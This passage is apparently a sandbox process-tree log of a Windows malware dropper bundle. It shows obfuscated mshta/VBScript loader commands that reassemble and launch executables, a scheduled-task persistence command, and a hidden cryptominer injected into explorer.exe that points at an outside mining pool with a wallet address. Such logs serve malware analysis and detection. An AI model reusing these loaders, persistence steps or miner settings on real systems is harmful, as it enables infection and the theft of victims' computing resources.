C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 8339b8a3901ebc775730ad458de2a583 OA4En7LMH0egnJJlDMRm8Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:3532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4760 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:4168
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:10528
-
-
C:\Users\Admin\AppData\Local\Temp\is-INFBI.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-INFBI.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$30118,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2928 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe" /SILENT2⤵
- Executes dropped EXE
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\is-LOUD0.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-LOUD0.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$30172,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4880 -
C:\Users\Admin\AppData\Local\Temp\is-8CMQ3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-8CMQ3.tmp\postback.exe" ss14⤵
- Executes dropped EXE
PID:5812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe1⤵
- Executes dropped EXE
PID:4468
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exeWed094c47c32b.exe1⤵
- Executes dropped EXE
PID:2160 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))2⤵PID:4036
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"3⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF4⤵
- Executes dropped EXE
PID:5976 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))5⤵PID:5536
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"6⤵PID:1460
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))5⤵PID:3544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t6⤵PID:5872
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"7⤵PID:4372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "7⤵PID:2468
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU7⤵
- Loads dropped DLL
PID:5436
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exeWed09abf83d9c2.exe1⤵
- Executes dropped EXE
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09abf83d9c2.exe" -u2⤵
- Executes dropped EXE
PID:2908
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed096a1bff61.exeWed096a1bff61.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
PID:5688 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Users\Admin\AppData\Roaming\4254119.exe"C:\Users\Admin\AppData\Roaming\4254119.exe"4⤵PID:2964
-
-
C:\Users\Admin\AppData\Roaming\1823905.exe"C:\Users\Admin\AppData\Roaming\1823905.exe"4⤵PID:2328
-
-
C:\Users\Admin\AppData\Roaming\1392420.exe"C:\Users\Admin\AppData\Roaming\1392420.exe"4⤵PID:3596
-
-
C:\Users\Admin\AppData\Roaming\7069117.exe"C:\Users\Admin\AppData\Roaming\7069117.exe"4⤵PID:6368
-
-
C:\Users\Admin\AppData\Roaming\8246734.exe"C:\Users\Admin\AppData\Roaming\8246734.exe"4⤵
- Suspicious use of SetThreadContext
PID:1528 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 2965⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7360
-
-
-
C:\Users\Admin\AppData\Roaming\12432.exe"C:\Users\Admin\AppData\Roaming\12432.exe"4⤵
- Suspicious behavior: SetClipboardViewer
PID:5220
-
-
C:\Users\Admin\AppData\Roaming\7472820.exe"C:\Users\Admin\AppData\Roaming\7472820.exe"4⤵PID:5468
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵PID:5672
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"3⤵
- Executes dropped EXE
PID:5912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 2364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8092
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
PID:6364
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵PID:7024
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7024 -s 17244⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4316
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵PID:6040
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )4⤵PID:2940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵PID:5292
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:6100
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵PID:2044
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )7⤵PID:6472
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC8⤵PID:5576
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵PID:5716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵PID:2156
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
PID:6324
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
PID:2512
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:2496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 6004⤵
- Program crash
- Enumerates system info in registry
PID:7088
-
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"3⤵PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Loads dropped DLL
PID:6284 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵PID:6288
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵PID:11212
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee06⤵PID:7980
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2476 /prefetch:16⤵PID:3952
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2396 /prefetch:86⤵PID:1256
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=1716 /prefetch:86⤵PID:9024
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:26⤵PID:9012
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2484 /prefetch:16⤵PID:9172
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:26⤵
- Modifies registry class
PID:10384
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3256 /prefetch:86⤵PID:10380
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2696 /prefetch:86⤵PID:5656
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3660 /prefetch:86⤵PID:7148
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2348 /prefetch:86⤵
- Loads dropped DLL
- Adds Run key to start application
PID:6288
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3448 /prefetch:86⤵PID:8848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵PID:5560
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵PID:7264
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵PID:6304
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
PID:5676
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵PID:5752
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵PID:1268
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
PID:9520 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:11692
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵PID:5332
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵PID:5832
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"3⤵PID:3652
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exe1⤵
- Executes dropped EXE
PID:2948
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Users\Admin\AppData\Roaming\4316430.exe"C:\Users\Admin\AppData\Roaming\4316430.exe"2⤵
- Executes dropped EXE
PID:5524
-
-
C:\Users\Admin\AppData\Roaming\5699730.exe"C:\Users\Admin\AppData\Roaming\5699730.exe"2⤵
- Executes dropped EXE
PID:5640
-
-
C:\Users\Admin\AppData\Roaming\6454724.exe"C:\Users\Admin\AppData\Roaming\6454724.exe"2⤵
- Executes dropped EXE
PID:5796
-
-
C:\Users\Admin\AppData\Roaming\788088.exe"C:\Users\Admin\AppData\Roaming\788088.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5924 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Drops file in Windows directory
- Enumerates system info in registry
PID:6108
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:6396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 4482⤵
- Program crash
PID:6108
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6396 -ip 63961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4092 -ip 40921⤵PID:6172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2212 -ip 22121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3320 -ip 33201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4468 -ip 44681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2020
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 672 -p 6364 -ip 63641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2176 -ip 21761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6484
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1460
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 7024 -ip 70241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5584 -ip 55841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1120 -ip 11201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2624 -ip 26241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 2852 -ip 28521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5048 -ip 50481⤵PID:4540
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3652 -ip 36521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5964 -ip 59641⤵
